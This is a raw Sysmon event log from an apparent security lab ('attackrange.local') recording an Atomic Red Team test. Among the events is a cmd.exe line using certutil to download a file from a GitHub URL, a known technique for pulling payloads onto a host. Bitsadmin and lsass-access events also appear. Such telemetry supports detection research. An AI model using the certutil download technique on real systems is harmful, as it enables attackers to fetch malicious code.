21:49:22.196{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E2-605B-6969-00000000AE01}7096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af43b9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3aaaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+afe7b349(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af37009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3d3b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b59b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3a66d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3e2d74(wow64) 154100x80000000000000005917132Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.187{896A638B-B3E2-605B-6969-00000000AE01}7096C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000005917131Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.187{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-24 21:49:22.186 11241100x80000000000000005917130Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.186{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-24 21:49:22.185 23542300x8000000000000000638428Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:23.851{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1B22D0C15A220687502A56C8B8C6842,SHA256=7A0105E63152542EA018B8FA04685AD58B21144E5D3DA9E150C4EB34C2B3CE1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917203Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.823{896A638B-B5CB-6058-1600-00000000AE01}13087204C:\Windows\System32\svchost.exe{896A638B-B3E2-605B-6C69-00000000AE01}6204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917202Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.823{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B3E2-605B-6C69-00000000AE01}6204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917201Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.772{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B3E2-605B-6C69-00000000AE01}6204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917200Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.772{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B3E2-605B-6C69-00000000AE01}6204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005917199Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:20.961{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local63257- 10341000x80000000000000005917198Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.721{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917197Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.721{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000005917196Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:49:23.709{896A638B-B3E2-605B-6C69-00000000AE01}6204\PSHost.132610961626030688.6204.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000005917195Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.692{896A638B-B3E2-605B-6C69-00000000AE01}6204ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_nl5uxbyk.jdw.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917194Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.691{896A638B-B3E2-605B-6C69-00000000AE01}6204ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_acdrrnkn.ge5.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005917193Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.466{896A638B-B3E2-605B-6C69-00000000AE01}6204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_acdrrnkn.ge5.ps12021-03-24 21:49:23.466 10341000x80000000000000005917192Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.442{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B3E2-605B-6C69-00000000AE01}6204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917191Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.411{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F167CF1C00D0626C19135DC1A8D12C8,SHA256=9EDA1C0C4292C982F26D4C2840502060F9907C3755B2C2F65F2D4460EAFF2736,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917190Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.411{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D16C435850865271D8AF0B020AF9BF38,SHA256=C00B34EB95D558B03C28B57070315F36C46F58031A5C421265E2208B5CBD24FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917189Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.408{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4296EB5FEA29D2B550E006AC561EE22A,SHA256=C89006AE6E595F53CCCC87F8A8508DADB9E3FBE1C07605EB38E8FF0573DBDD8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917188Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.406{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07B56B4278DA1F2775A01ABBD1124930,SHA256=1E49642AC09704B64100FA68723032583EF2822DA09F2F2EA6642362F0ED162E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917187Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.404{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D4B627A2F74DBB56A357D731D96B2CCF,SHA256=B90B0D5C7347082BF94E842FD59ED99523D14BC6A5745648D409AEF60D44B3A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638427Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:19.304{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57248-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638426Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:23.023{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=44F9EE30BF071EFC8FAF5DC28D968095,SHA256=ED7A8A5B56510F080F3A482B0FBA8722861731E08BBAC9CF44D0FF31A8FB747F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638425Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:23.023{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15B79E7D7DB520E1738B106689809EFF,SHA256=6F6784BB8BD5FE4CE8DA1E3070577FBB085546C1E05CCA7BC9368BE055B5BA9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638429Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:24.882{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F2CA8FA79AF64EFB0C96A41ECFA5D4F,SHA256=6C42C3AC700B7B11442595038E6EC0060D8924869CC623DE1228B4DD7350456B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917266Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.186{00000000-0000-0000-0000-000000000000}2208<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1487-false185.199.111.133cdn-185-199-111-133.github.com443https 354300x80000000000000005917265Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:20.974{00000000-0000-0000-0000-000000000000}2208<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1486-false185.199.111.133cdn-185-199-111-133.github.com443https 10341000x80000000000000005917264Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.722{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917263Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.722{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917262Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.619{896A638B-B5CB-6058-1600-00000000AE01}1308NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\BITBC72.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917261Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.569{896A638B-B5CB-6058-1600-00000000AE01}1308NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\BITBC72.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917260Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.566{896A638B-B5CB-6058-1600-00000000AE01}13085732C:\Windows\System32\svchost.exe{896A638B-B3E4-605B-6F69-00000000AE01}932C:\Windows\System32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000005917259Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.550{896A638B-B5CA-6058-1300-00000000AE01}3882296C:\Windows\system32\svchost.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005917258Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.546{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917257Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.545{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917256Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 